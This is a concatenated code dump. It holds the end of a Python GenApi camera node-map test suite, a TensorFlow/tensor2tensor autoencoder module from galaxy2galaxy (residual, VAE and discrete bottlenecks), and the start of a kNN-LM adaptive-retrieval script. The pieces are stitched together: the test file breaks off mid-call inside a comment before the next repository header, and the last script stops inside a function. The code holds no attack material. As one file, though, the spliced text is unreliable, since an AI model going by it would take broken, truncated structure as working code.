<Bit>2</Bit>
</StructEntry>
</StructReg>
<Port Name="MyPort"/>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestStructReg")
# create and initialize a test port
Port = CTestPort()
Port.CreateEntry(0x02, "uint32_t", 0xFFFFFFFF, RW, LittleEndian)
# connect the node map to the port
Camera._Connect(Port, "MyPort")
Bit0 = Camera.GetNode("Bit0")
self.assertTrue(bool(Bit0))
Bit1 = Camera.GetNode("Bit1")
self.assertTrue(bool(Bit1))
Bit2 = Camera.GetNode("Bit2")
self.assertTrue(bool(Bit2))
Bit0 = Bit0.GetValue()
Bit1 = Bit1.GetValue()
Bit2 = Bit2.GetValue()
self.assertEqual(1, Bit0)
self.assertEqual(1, Bit1)
self.assertEqual(1, Bit2)
def test_Extension(self):
"""[ GenApiTest@NodeTestSuite_TestExtension.xml|gxml
<Node Name="CatNode">
<Extension>
<MyFavourite>123</MyFavourite>
<AnotherNode>
<WithSubNode>bla</WithSubNode>
<WithSubNode>blub</WithSubNode>
</AnotherNode>
</Extension>
</Node>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestExtension")
def test_AccessModeCache(self):
Port = CTestPort()
RegisterA = 0
RegisterB = 0
Port.CreateEntry(0x4000, "uint32_t", RegisterA, RW, LittleEndian)
Port.CreateEntry(0x4004, "uint32_t", RegisterB, RW, LittleEndian)
"""[ GenApiTest@NodeTestSuite_TestAccessModeCache.xml|gxml
<IntReg Name="A">
<Address>0x4000</Address>
<Length>4</Length>
<AccessMode>RO</AccessMode>
<pPort>MyPort</pPort>
<Cachable>NoCache</Cachable>
<Sign>Unsigned</Sign>
<Endianess>BigEndian</Endianess>
</IntReg>
<IntReg Name="B">
<Address>0x4004</Address>
<Length>4</Length>
<AccessMode>RO</AccessMode>
<pPort>MyPort</pPort>
<Cachable>NoCache</Cachable>
<Sign>Unsigned</Sign>
<Endianess>BigEndian</Endianess>
</IntReg>
<IntSwissKnife Name="C">
<pVariable Name="VAR_A">A</pVariable>
<pVariable Name="VAR_B">B</pVariable>
<Formula>(VAR_A + VAR_B) > 0</Formula>
</IntSwissKnife>
<Integer Name="D">
<pIsAvailable>C</pIsAvailable>
<Value>0</Value>
</Integer>
<Float Name="E">
<pIsAvailable>C</pIsAvailable>
<Value>0</Value>
</Float>
<Command Name="F">
<pIsAvailable>C</pIsAvailable>
<pValue>Helper</pValue>
<CommandValue>1</CommandValue>
</Command>
<IntSwissKnife Name="G">
<pIsAvailable>C</pIsAvailable>
<Formula>0</Formula>
</IntSwissKnife>
<SwissKnife Name="H">
<pIsAvailable>C</pIsAvailable>
<Formula>0</Formula>
</SwissKnife>
<Enumeration Name="I">
<pIsAvailable>C</pIsAvailable>
<EnumEntry Name="EnumValue1">
<Value>0</Value>
</EnumEntry>
<Value>0</Value>
</Enumeration>
<Port Name="J">
<pIsAvailable>C</pIsAvailable>
</Port>
<Register Name="K">
<pIsAvailable>C</pIsAvailable>
<Address>0</Address>
<Length>1</Length>
<AccessMode>RW</AccessMode>
<pPort>MyPort</pPort>
</Register>
<Boolean Name="L">
<pIsAvailable>C</pIsAvailable>
<Value>0</Value>
</Boolean>
<Enumeration Name="M">
<EnumEntry Name="EnumValue1">
<pIsAvailable>C</pIsAvailable>
<Value>0</Value>
</EnumEntry>
<Value>0</Value>
</Enumeration>
<Integer Name="N">
<pIsImplemented>C</pIsImplemented>
<Value>0</Value>
</Integer>
<Integer Name="O">
<pIsLocked>C</pIsLocked>
<Value>0</Value>
</Integer>
<Integer Name="P">
<pValue>D</pValue>
</Integer>
<IntSwissKnife Name="isk">
<pVariable Name="VAR_A">A</pVariable>
<pVariable Name="VAR_B">B</pVariable>
<Formula>VAR_A + VAR_B</Formula>
</IntSwissKnife>
<SwissKnife Name="fsk">
<pVariable Name="VAR_A">A</pVariable>
<pVariable Name="VAR_B">B</pVariable>
<Formula>VAR_A + VAR_B</Formula>
</SwissKnife>
<IntConverter Name="ic">
<pVariable Name="VAR_A">A</pVariable>
<pVariable Name="VAR_B">B</pVariable>
<FormulaTo>0</FormulaTo>
<FormulaFrom>VAR_A + VAR_B</FormulaFrom>
<pValue>Helper</pValue>
</IntConverter>
<Converter Name="fc">
<pVariable Name="VAR_A">A</pVariable>
<pVariable Name="VAR_B">B</pVariable>
<FormulaTo>0</FormulaTo>
<FormulaFrom>VAR_A + VAR_B</FormulaFrom>
<pValue>Helper</pValue>
</Converter>
<Integer Name="Helper">
<ImposedAccessMode>WO</ImposedAccessMode>
<Value>0</Value>
</Integer>
<Port Name="MyPort"/>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestAccessModeCache")
Camera._Connect(Port, "MyPort")
# (connect also the other tested port)
PortJ = CTestPort()
Camera._Connect(PortJ, "J")
lA = Camera.GetNode("A")
lB = Camera.GetNode("B")
lD = Camera.GetNode("D")
lE = Camera.GetNode("E")
lF = Camera.GetNode("F")
lG = Camera.GetNode("G")
lH = Camera.GetNode("H")
lI = Camera.GetNode("I")
lJ = Camera.GetNode("J")
lK = Camera.GetNode("K")
lL = Camera.GetNode("L")
lM = Camera.GetNode("M")
lN = Camera.GetNode("N")
lO = Camera.GetNode("O")
lP = Camera.GetNode("P")
# Validate registers initial state
self.assertTrue(lA.GetValue() == 0)
self.assertTrue(lB.GetValue() == 0)
# Validate expected original access mode: NA.
# Required as it populates the access mode cache.
self.assertTrue(not IsAvailable(lD.GetAccessMode()))
self.assertTrue(not IsAvailable(lE.GetAccessMode()))
self.assertTrue(not IsAvailable(lF.GetAccessMode()))
self.assertTrue(not IsAvailable(lG.GetAccessMode()))
self.assertTrue(not IsAvailable(lH.GetAccessMode()))
self.assertTrue(not IsAvailable(lI.GetAccessMode()))
self.assertTrue(not IsAvailable(lJ.GetAccessMode()))
self.assertTrue(not IsAvailable(lK.GetAccessMode()))
self.assertTrue(not IsAvailable(lL.GetAccessMode()))
self.assertTrue(not IsAvailable(lM.GetAccessMode()))
self.assertTrue(not IsImplemented(lN.GetAccessMode()))
self.assertTrue(IsWritable(lO.GetAccessMode()))
self.assertTrue(not IsAvailable(lP.GetAccessMode()))
# Directly change A value
lNewAVal = 4
lAccessA = RW # Out, irrelevant
Port.UpdateEntry(0x4000, cast_data("uint32_t", LittleEndian, lNewAVal), lAccessA)
# Directly change B value
lNewBVal = 2
lAccessB = RW # Out, irrelevant
Port.UpdateEntry(0x4004, cast_data("uint32_t", LittleEndian, lNewBVal), lAccessB)
# Now the big test - with 0000378 fixed, should pass
self.assertTrue(IsAvailable(lD.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lE.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lF.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lG.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lH.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lI.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lJ.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lK.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lL.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lM.Node.GetAccessMode()))
self.assertTrue(IsImplemented(lN.Node.GetAccessMode()))
self.assertTrue(not IsWritable(lO.Node.GetAccessMode()))
self.assertTrue(IsAvailable(lP.Node.GetAccessMode()))
isk = Camera.GetNode("isk")
fsk = Camera.GetNode("fsk")
ic = Camera.GetNode("ic")
fc = Camera.GetNode("fc")
self.assertEqual(NoCache, isk.GetNode().GetCachingMode())
self.assertEqual(NoCache, fsk.GetNode().GetCachingMode())
self.assertEqual(NoCache, ic.GetNode().GetCachingMode())
self.assertEqual(NoCache, fc.GetNode().GetCachingMode())
def test_IsUncached(self):
# if(GenApiSchemaVersion == v1_0)
# return
"""[ GenApiTest@NodeTestSuite_TestIsUncached.xml|gxml
<Integer Name="Value">
<pValue>ValueReg</pValue>
</Integer>
<IntReg Name="ValueReg">
<pBlockPolling>PollingDisabler</pBlockPolling>
<Address>0x0000</Address>
<Length>4</Length>
<AccessMode>RW</AccessMode>
<pPort>Port</pPort>
<PollingTime>1000</PollingTime>
<Sign>Unsigned</Sign>
<Endianess>LittleEndian</Endianess>
</IntReg>
<Integer Name="PollingDisabler">
<pIsAvailable>PollingDisablerAvail</pIsAvailable>
<Value>0</Value>
</Integer>
<Integer Name="PollingDisablerAvail">
<Value>1</Value>
</Integer>
<Port Name="Port"/>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestIsUncached")
# type definition of TestIsUncached is above
regs = [("Value", "uint32_t", 0, RW, LittleEndian), ]
Port = CStructTestPort(regs)
self.assertEqual(intfIPort, Port.GetPrincipalInterfaceType())
Port.Value = 42
Camera._Connect(Port, "Port")
Value = Camera.GetNode("Value")
ValueReg = Camera.GetNode("ValueReg")
PollingDisabler = Camera.GetNode("PollingDisabler")
PollingDisablerAvail = Camera.GetNode("PollingDisablerAvail")
self.assertEqual(42, Value.GetValue())
# Change the register value; since the register is cached, the Value node will not notice...
Port.Value = 13
self.assertEqual(42, Value.GetValue())
# ...until the register is polled
Camera._Poll(2000)
self.assertEqual(13, Value.GetValue())
# Now we do it again but first we block the polling
Port.Value = 42
PollingDisabler.SetValue(1)
# setting the disabler invalidates the nodes, so we have to fill the caches again by reading the Value
self.assertEqual(42, Value.GetValue())
# Change the register value; since the register is cached, the Value node will not notice...
Port.Value = 13
self.assertEqual(42, Value.GetValue())
# ...until the register is polled
Camera._Poll(2000)
# But the polling didn't happen so the cached value is still valid
self.assertEqual(42, Value.GetValue())
# If we invalidate the Value node explicitly...
Value.GetNode().InvalidateNode()
# ...nothing happens because the cache of the register node was not invalidated
self.assertEqual(42, Value.GetValue())
# However, if we invalidate the ValueReg node explicitly...
ValueReg.GetNode().InvalidateNode()
# ... we finally get the value
self.assertEqual(13, Value.GetValue())
# now make the disabler unreadable and repeat similar tests
PollingDisablerAvail.SetValue(0)
self.assertTrue(not IsAvailable(Value)) ## is this expected?
#
# struct MyCallbackUtility
# {
# static void Reset() { m_Count=0 }
# static void Callback( INode* ) { ++m_Count }
# static uint32_t Count() { return m_Count }
# private:
# static unsigned m_Count
# }
# unsigned MyCallbackUtility::m_Count=0
#
#
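# A rough Python counterpart of the commented-out C++ helper above (illustrative
# sketch only; this hypothetical class is not used by the tests in this file):
#
#   class MyCallbackUtility(object):
#       _count = 0
#       @classmethod
#       def Reset(cls):
#           cls._count = 0
#       @classmethod
#       def Callback(cls, node):
#           cls._count += 1
#       @classmethod
#       def Count(cls):
#           return cls._count
#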
def test_WriteCache(self):
"""[ GenApiTest@NodeTestSuite_TestWriteCache.xml|gxml
<Boolean Name="IOBit">
<pValue>IOBitInteger</pValue>
</Boolean>
<Integer Name="IOBitSelector">
<Value>0</Value>
<Min>0</Min>
<Max>7</Max>
</Integer>
<IntConverter Name="IOBitInteger">
<pVariable Name="SEL">IOBitSelector</pVariable>
<pVariable Name="CUR">IORegister</pVariable>
<!-- To = From ? CUR | 1 << SEL : CUR & ~(1 << SEL) -->
<FormulaTo>(FROM) ? (CUR | (1 << SEL)) : (CUR & (~ (1 << SEL)))</FormulaTo>
<!-- From = To >> SEL & 1 -->
<FormulaFrom>(TO >> SEL) & 1</FormulaFrom>
<pValue>IORegister</pValue>
<Slope>Varying</Slope>
</IntConverter>
<IntReg Name="IORegister">
<Address>0x00000000</Address>
<Length>1</Length>
<AccessMode>RW</AccessMode>
<pPort>Device</pPort>
<Cachable>WriteThrough</Cachable>
<Sign>Unsigned</Sign>
<Endianess>LittleEndian</Endianess>
</IntReg>
<Port Name="Device" >
</Port>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestWriteCache")
regs = [("bit", "uint8_t,bits", 0, RW, LittleEndian),
]
Port = CStructTestPort(regs)
print(Port.struct_entries.keys())
Port.bit0 = 0
Port.bit1 = 1
Port.bit2 = 0
Port.bit3 = 1
Port.bit4 = 0
Port.bit5 = 1
Port.bit6 = 0
Port.bit7 = 1
Camera._Connect(Port, "Device")
IOBitSelector = Camera.GetNode("IOBitSelector")
IOBit = Camera.GetNode("IOBit")
IORegister = Camera.GetNode("IORegister")
#################/
# test reading
# prepare measurement
Port.InvalidateNode()
Port.ResetStatistics()
self.assertEqual(0, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
self.assertTrue(not IORegister.IsValueCacheValid())
print("write")
Port.bit2 = 0
# read bit2
IOBitSelector.SetValue(2)
self.assertEqual(0, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
# first time
self.assertEqual(False, IOBit.GetValue())
self.assertEqual(1, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
self.assertTrue(IORegister.IsValueCacheValid())
# second time
self.assertEqual(False, IOBit.GetValue())
self.assertEqual(1, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
self.assertTrue(IORegister.IsValueCacheValid())
#################/
# test writing
# prepare measurement
Port.InvalidateNode()
Port.ResetStatistics()
self.assertEqual(0, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
self.assertTrue(not IORegister.IsValueCacheValid())
# write bit3
IOBitSelector.SetValue(3)
self.assertEqual(0, Port.GetNumReads())
self.assertEqual(0, Port.GetNumWrites())
# first time
IOBit.SetValue(False)
self.assertEqual(1, Port.GetNumReads())
self.assertEqual(1, Port.GetNumWrites())
self.assertEqual(0, Port.bit3)
self.assertTrue(IORegister.IsValueCacheValid())
# second time
IOBit.SetValue(True)
self.assertEqual(1, Port.GetNumReads())
self.assertEqual(2, Port.GetNumWrites())
self.assertEqual(True, Port.bit3)
self.assertTrue(IORegister.IsValueCacheValid())
#
# class NodeNameTester : public std::unary_function<INode*, bool>
# {
# gcstring Name
# public:
# NodeNameTester (const char _Name[]) : Name(_Name) {}
# bool operator() (INode *pNode) const { return pNode.GetName()==Name}
# }
#
# class NodeFinder
# {
# NodeNameTester Test
# public:
# NodeFinder (const char _Name[]) : Test(_Name) {}
# bool operator() (NodeList_t &List) const { return count_if(List.begin(), List.end(), Test)>0}
# }
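# In Python the two commented-out C++ functors above collapse into one small helper
# (illustrative sketch only; this hypothetical function is not used by the tests):
#
#   def find_node_by_name(node_list, name):
#       """Return True if node_list contains a node whose GetName() equals name."""
#       return any(node.GetName() == name for node in node_list)
#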
def test_LinkTypes(self):
# if(GenApiSchemaVersion == v1_0)
# return
"""[ GenApiTest@NodeTestSuite_TestLinkTypes.xml|gxml
<Integer Name="TheNode">
<pInvalidator>G</pInvalidator>
<pValue>A</pValue>
<pMin>B</pMin>
</Integer>
<Integer Name="A">
<pValue>C</pValue>
</Integer>
<Integer Name="B">
<Value>0</Value>
</Integer>
<Integer Name="C">
<Value>0</Value>
</Integer>
<Integer Name="D">
<pValue>TheNode</pValue>
</Integer>
<Integer Name="E">
<pValue>D</pValue>
</Integer>
<Integer Name="F">
<pInvalidator>TheNode</pInvalidator>
<Value>0</Value>
</Integer>
<Integer Name="G">
<pInvalidator>H</pInvalidator>
<Value>0</Value>
</Integer>
<Integer Name="H">
<Value>0</Value>
</Integer>
"""
Camera = CNodeMapRef()
Camera._LoadXMLFromFile("GenApiTest", "NodeTestSuite_TestLinkTypes")
Node = Camera.GetNode("TheNode")
# NodeList_t Children
# NodeFinder FindA("A")
# NodeFinder FindB("B")
# NodeFinder FindC("C")
# NodeFinder FindD("D")
# NodeFinder FindE("E")
# NodeFinder FindF("F")
# NodeFinder FindG("G")
# NodeFinder FindH("H")
# Children.clear ()
# Node.GetChildren (Children, ctWritingChildren)
# self.assertEqual (1, Children.size())
# self.assertTrue (FindA(Children))
# self.assertTrue (not FindB(Children))
# self.assertTrue (not FindC(Children))
# Children.clear ()
# Node.GetChildren (Children, ctReadingChildren)
# self.assertEqual (2, Children.size())
# self.assertTrue (FindA(Children))
# self.assertTrue (FindB(Children))
# self.assertTrue (not FindC(Children))
# Children.clear ()
# Node.GetChildren (Children, ctTerminalNodes)
# self.assertEqual (1, Children.size())
# self.assertTrue (not FindA(Children))
# self.assertTrue (not FindB(Children))
# self.assertTrue (FindC(Children))
# Children.clear ()
# Node.GetChildren (Children, ctDependingNodes)
# self.assertEqual (3, Children.size())
# self.assertTrue (FindD(Children))
# self.assertTrue (FindE(Children))
# self.assertTrue (FindF(Children))
# Children.clear ()
# Node.GetChildren (Children,
# Repository: gitter-badger/galaxy2galaxy
# coding=utf-8
# Copyright 2019 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Autoencoders."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.layers import common_attention
from tensor2tensor.layers import common_hparams
from tensor2tensor.layers import common_layers
from tensor2tensor.layers import discretization
from tensor2tensor.layers import latent_layers
from tensor2tensor.layers import modalities
from tensor2tensor.utils import t2t_model
from tensor2tensor.models.research import autoencoders
from galaxy2galaxy.utils import registry
import tensorflow as tf
def pack_images(images, rows, cols):
"""Helper utility to make a field of images."""
shape = tf.shape(images)
width = shape[-3]
height = shape[-2]
depth = shape[-1]
images = tf.reshape(images, (-1, width, height, depth))
batch = tf.shape(images)[0]
rows = tf.minimum(rows, batch)
cols = tf.minimum(batch // rows, cols)
images = images[:rows * cols]
images = tf.reshape(images, (rows, cols, width, height, depth))
images = tf.transpose(images, [0, 2, 1, 3, 4])
images = tf.reshape(images, [1, rows * width, cols * height, depth])
return images
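# Illustrative example (not part of the original module): a batch of 16 RGB images
# of size 32x32 packed into a 4x4 grid yields a single summary image of shape
# [1, 128, 128, 3]:
#   grid = pack_images(tf.zeros([16, 32, 32, 3]), rows=4, cols=4)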
@registry.register_model
class ContinuousAutoencoderBasic(autoencoders.AutoencoderBasic):
"""Continuous version of the basic Autoencoder"""
def reconstruction_loss(self, values, targets):
hparams = self.hparams
pz = tf.reduce_sum(tf.abs(values - targets)**2, axis=[-1, -2, -3]) / hparams.reconstruction_loss_sigma**2
return tf.reduce_mean(pz)
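# Up to constant offset and scale, the loss above is the negative log-likelihood of
# an isotropic Gaussian observation model with standard deviation
# hparams.reconstruction_loss_sigma: the squared L2 distance between reconstruction
# and target is summed over pixels and channels, scaled by 1/sigma^2 and averaged
# over the batch.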
def image_summary(self, name, image_logits, max_outputs=1, rows=8, cols=8):
"""Helper for image summaries that are safe on TPU."""
if len(image_logits.get_shape()) != 4:
tf.logging.info("Not generating image summary, maybe not an image.")
return
return tf.summary.image(
name, pack_images(image_logits, rows, cols),
#common_layers.tpu_safe_image_summary(pack_images(tensor, rows, cols)),
max_outputs=max_outputs)
def body(self, features):
hparams = self.hparams
is_training = hparams.mode == tf.estimator.ModeKeys.TRAIN
encoder_layers = None
self.is1d = hparams.sample_width == 1
if (hparams.mode != tf.estimator.ModeKeys.PREDICT
or self._encode_on_predict):
labels = features["targets_raw"]
labels_shape = common_layers.shape_list(labels)
# handle videos
if len(labels.shape) == 5:
labels = time_to_channels(labels)
shape = common_layers.shape_list(labels)
x = tf.expand_dims(labels, axis=-1)
x = self.embed(x)
target_codes = x
print(x)
if shape[2] == 1:
self.is1d = True
# Run encoder.
x, encoder_layers = self.encoder(x)
# Bottleneck.
b, b_loss = self.bottleneck(x)
xb_loss = 0.0
b_shape = common_layers.shape_list(b)
self._cur_bottleneck_tensor = b
res_size = common_layers.shape_list(x)[-1]
b = self.unbottleneck(b, res_size)
if not is_training:
x = b
else:
l = 2**hparams.num_hidden_layers
warm_step = int(hparams.bottleneck_warmup_steps * 0.25 * l)
nomix_p = common_layers.inverse_lin_decay(warm_step) + 0.01
if common_layers.should_generate_summaries():
tf.summary.scalar("nomix_p_bottleneck", nomix_p)
rand = tf.random_uniform(common_layers.shape_list(x))
# This is the distance between b and x. Having this as loss helps learn
# the bottleneck function, but if we back-propagated to x it would be
# minimized by just setting x=0 and b=0 -- so we don't want too much
# of the influence of this, and we stop-gradient to not zero-out x.
x_stop = tf.stop_gradient(x)
xb_loss = tf.reduce_mean(tf.reduce_sum(
tf.squared_difference(x_stop, b), axis=-1))
# To prevent this loss from exploding we clip at 1, but anneal clipping.
clip_max = 1.0 / common_layers.inverse_exp_decay(
warm_step, min_value=0.001)
xb_clip = tf.maximum(tf.stop_gradient(xb_loss), clip_max)
xb_loss *= clip_max / xb_clip
x = tf.where(tf.less(rand, nomix_p), b, x)
else:
if self._cur_bottleneck_tensor is None:
b = self.sample()
else:
b = self._cur_bottleneck_tensor
self._cur_bottleneck_tensor = b
res_size = self.hparams.hidden_size * 2**self.hparams.num_hidden_layers
res_size = min(res_size, hparams.max_hidden_size)
x = self.unbottleneck(b, res_size)
# Run decoder.
x = self.decoder(x, encoder_layers)
# Cut to the right size and mix before returning.
res = x
if hparams.mode != tf.estimator.ModeKeys.PREDICT:
res = x[:, :shape[1], :shape[2], :]
# Final dense layer.
res = tf.layers.dense(
res, self.num_channels * hparams.hidden_size, name="res_dense")
output_shape = common_layers.shape_list(res)[:-1] + [
self.num_channels, self.hparams.hidden_size
]
res = tf.reshape(res, output_shape)
if hparams.mode == tf.estimator.ModeKeys.PREDICT:
reconstr = tf.layers.dense(res, self.num_channels, name="autoencoder_final")
return reconstr, {"bottleneck_loss": 0.0}
# Losses.
losses = {
"bottleneck_extra": b_loss,
"bottleneck_l2": hparams.bottleneck_l2_factor * xb_loss
}
reconstr = tf.layers.dense(res, self.num_channels, name="autoencoder_final")
reconstr = tf.reshape(reconstr, labels_shape)
targets_loss = self.reconstruction_loss(reconstr, labels)
losses["training"] = targets_loss
self.image_summary("inputs", labels)
self.image_summary("ae", reconstr)
return reconstr, losses
@registry.register_model
class ContinuousAutoencoderResidual(ContinuousAutoencoderBasic):
"""Residual autoencoder."""
def dropout(self, x):
is_training = self.hparams.mode == tf.estimator.ModeKeys.TRAIN
hparams = self.hparams
if hparams.dropout <= 0.0 or not is_training:
return x
warm_step = hparams.bottleneck_warmup_steps * 2**hparams.num_hidden_layers
dropout = common_layers.inverse_lin_decay(warm_step // 2) * hparams.dropout
return common_layers.dropout_with_broadcast_dims(
x, 1.0 - dropout, broadcast_dims=[-1])
def encoder(self, x):
with tf.variable_scope("encoder"):
hparams = self.hparams
layers = []
kernel, strides = self._get_kernel_and_strides()
residual_kernel = (hparams.residual_kernel_height,
hparams.residual_kernel_width)
residual_kernel1d = (hparams.residual_kernel_height, 1)
residual_kernel = residual_kernel1d if self.is1d else residual_kernel
residual_conv = tf.layers.conv2d
if hparams.residual_use_separable_conv:
residual_conv = tf.layers.separable_conv2d
# Down-convolutions.
for i in range(hparams.num_hidden_layers):
with tf.variable_scope("layer_%d" % i):
x = self.make_even_size(x)
layers.append(x)
x = self.dropout(x)
filters = hparams.hidden_size * 2**(i + 1)
filters = min(filters, hparams.max_hidden_size)
x = common_attention.add_timing_signal_nd(x)
x = tf.layers.conv2d(
x,
filters,
kernel,
strides=strides,
padding="SAME",
activation=common_layers.belu,
name="strided")
y = x
y = tf.nn.dropout(y, 1.0 - hparams.residual_dropout)
for r in range(hparams.num_residual_layers):
residual_filters = filters
if r < hparams.num_residual_layers - 1:
residual_filters = int(
filters * hparams.residual_filter_multiplier)
y = residual_conv(
y,
residual_filters,
residual_kernel,
padding="SAME",
activation=common_layers.belu,
name="residual_%d" % r)
x += y
x = common_layers.layer_norm(x, name="ln")
return x, layers
def decoder(self, x, encoder_layers=None):
with tf.variable_scope("decoder"):
hparams = self.hparams
is_training = self.hparams.mode == tf.estimator.ModeKeys.TRAIN
kernel, strides = self._get_kernel_and_strides()
residual_kernel = (hparams.residual_kernel_height,
hparams.residual_kernel_width)
residual_kernel1d = (hparams.residual_kernel_height, 1)
residual_kernel = residual_kernel1d if self.is1d else residual_kernel
residual_conv = tf.layers.conv2d
if hparams.residual_use_separable_conv:
residual_conv = tf.layers.separable_conv2d
# Up-convolutions.
for i in range(hparams.num_hidden_layers):
j = hparams.num_hidden_layers - i - 1
if is_training:
nomix_p = common_layers.inverse_lin_decay(
int(hparams.bottleneck_warmup_steps * 0.25 * 2**j)) + 0.01
if common_layers.should_generate_summaries():
tf.summary.scalar("nomix_p_%d" % j, nomix_p)
filters = hparams.hidden_size * 2**j
filters = min(filters, hparams.max_hidden_size)
with tf.variable_scope("layer_%d" % i):
j = hparams.num_hidden_layers - i - 1
x = tf.layers.conv2d_transpose(
x,
filters,
kernel,
strides=strides,
padding="SAME",
activation=common_layers.belu,
name="strided")
y = x
for r in range(hparams.num_residual_layers):
residual_filters = filters
if r < hparams.num_residual_layers - 1:
residual_filters = int(
filters * hparams.residual_filter_multiplier)
y = residual_conv(
y,
residual_filters,
residual_kernel,
padding="SAME",
activation=common_layers.belu,
name="residual_%d" % r)
x += tf.nn.dropout(y, 1.0 - hparams.residual_dropout)
x = common_layers.layer_norm(x, name="ln")
x = common_attention.add_timing_signal_nd(x)
if encoder_layers is not None:
enc_x = encoder_layers[j]
enc_shape = common_layers.shape_list(enc_x)
x_mix = x[:enc_shape[0], :enc_shape[1], :enc_shape[2], :]
if is_training: # Mix at the beginning of training.
rand = tf.random_uniform(common_layers.shape_list(x_mix))
x_mix = tf.where(tf.less(rand, nomix_p), x_mix, enc_x)
x = x_mix
return x
@registry.register_model
class ContinuousAutoencoderResidualVAE(ContinuousAutoencoderResidual):
"""Residual VAE autoencoder."""
def bottleneck(self, x):
hparams = self.hparams
z_size = hparams.bottleneck_bits
x_shape = common_layers.shape_list(x)
with tf.variable_scope("vae"):
mu = tf.layers.dense(x, z_size, name="mu")
if hparams.mode != tf.estimator.ModeKeys.TRAIN:
return mu, 0.0 # No sampling or kl loss on eval.
log_sigma = tf.layers.dense(x, z_size, name="log_sigma")
epsilon = tf.random_normal(x_shape[:-1] + [z_size])
z = mu + tf.exp(log_sigma / 2) * epsilon
kl = 0.5 * tf.reduce_mean(
tf.expm1(log_sigma) + tf.square(mu) - log_sigma, axis=-1)
free_bits = z_size // 4
kl_loss = tf.reduce_mean(tf.maximum(kl - free_bits, 0.0))
return z, kl_loss * hparams.kl_beta
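# This is the usual VAE reparameterisation z = mu + sigma * eps, with log_sigma
# holding the log-variance. The KL term is the diagonal-Gaussian KL written via
# expm1, i.e. 0.5 * (exp(log_sigma) + mu^2 - 1 - log_sigma) per dimension, averaged
# over dimensions; a "free bits" allowance of bottleneck_bits // 4 is subtracted
# (clipped at zero) before weighting by kl_beta.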
def sample(self, features=None, shape=None):
del features
hparams = self.hparams
div_x = 2**hparams.num_hidden_layers
div_y = 1 if self.is1d else 2**hparams.num_hidden_layers
size = [
hparams.batch_size, hparams.sample_height // div_x,
hparams.sample_width // div_y, hparams.bottleneck_bits
]
size = size if shape is None else shape
return tf.random_normal(size)
@registry.register_model
class ContinuousAutoencoderBasicDiscrete(ContinuousAutoencoderBasic):
"""Discrete autoencoder."""
def bottleneck(self, x):
hparams = self.hparams
x = tf.tanh(tf.layers.dense(x, hparams.bottleneck_bits, name="bottleneck"))
d = x + tf.stop_gradient(2.0 * tf.to_float(tf.less(0.0, x)) - 1.0 - x)
if hparams.mode == tf.estimator.ModeKeys.TRAIN:
noise = tf.random_uniform(common_layers.shape_list(x))
noise = 2.0 * tf.to_float(tf.less(hparams.bottleneck_noise, noise)) - 1.0
d *= noise
x = common_layers.mix(d, x, hparams.discretize_warmup_steps,
hparams.mode == tf.estimator.ModeKeys.TRAIN)
return x, 0.0
def sample(self, features=None, shape=None):
del features
hp = self.hparams
div_x = 2**hp.num_hidden_layers
div_y = 1 if self.is1d else 2**hp.num_hidden_layers
size = [
hp.batch_size, hp.sample_height // div_x, hp.sample_width // div_y,
hp.bottleneck_bits
]
size = size if shape is None else shape
rand = tf.random_uniform(size)
return 2.0 * tf.to_float(tf.less(0.5, rand)) - 1.0
@registry.register_model
class ContinuousAutoencoderResidualDiscrete(ContinuousAutoencoderResidual):
"""Discrete residual autoencoder."""
def variance_loss(self, b):
part = tf.random_uniform(common_layers.shape_list(b))
selection = tf.to_float(tf.less(part, tf.random_uniform([])))
selection_size = tf.reduce_sum(selection)
part_avg = tf.abs(tf.reduce_sum(b * selection)) / (selection_size + 1)
return part_avg
def bottleneck(self, x, bottleneck_bits=None): # pylint: disable=arguments-differ
if bottleneck_bits is not None:
old_bottleneck_bits = self.hparams.bottleneck_bits
self.hparams.bottleneck_bits = bottleneck_bits
res, loss = discretization.parametrized_bottleneck(x, self.hparams)
if bottleneck_bits is not None:
self.hparams.bottleneck_bits = old_bottleneck_bits
return res, loss
def unbottleneck(self, x, res_size, reuse=None):
with tf.variable_scope("unbottleneck", reuse=reuse):
return discretization.parametrized_unbottleneck(x, res_size, self.hparams)
# File: ef_knnlm/domain_adaptation/adaptive_retrieval/adaptive_retrieval.py
import json
import sys
import os
import argparse
import time
import torch
import torch.nn as nn
import torch.optim as optim
import numpy as np
from collections import Counter, OrderedDict
from scipy.special import logsumexp
from datasets import load_dataset
from moe_modules import MLPMOE, LSTMMOE, TokenFeatureDataset
# from sklearn.model_selection import train_test_split
# from sklearn.preprocessing import StandardScaler
# from sklearn.metrics import accuracy_score, precision_recall_fscore_support
class Logger(object):
def __init__(self, output_file):
self.terminal = sys.stdout
self.log = open(output_file, "a")
def write(self, message):
print(message, end="", file=self.terminal, flush=True)
print(message, end="", file=self.log, flush=True)
def flush(self):
self.terminal.flush()
self.log.flush()
def validate(val_dataloader, model, args):
model.eval()
model.epoch_update()
running_loss = 0.
nsamples = 0
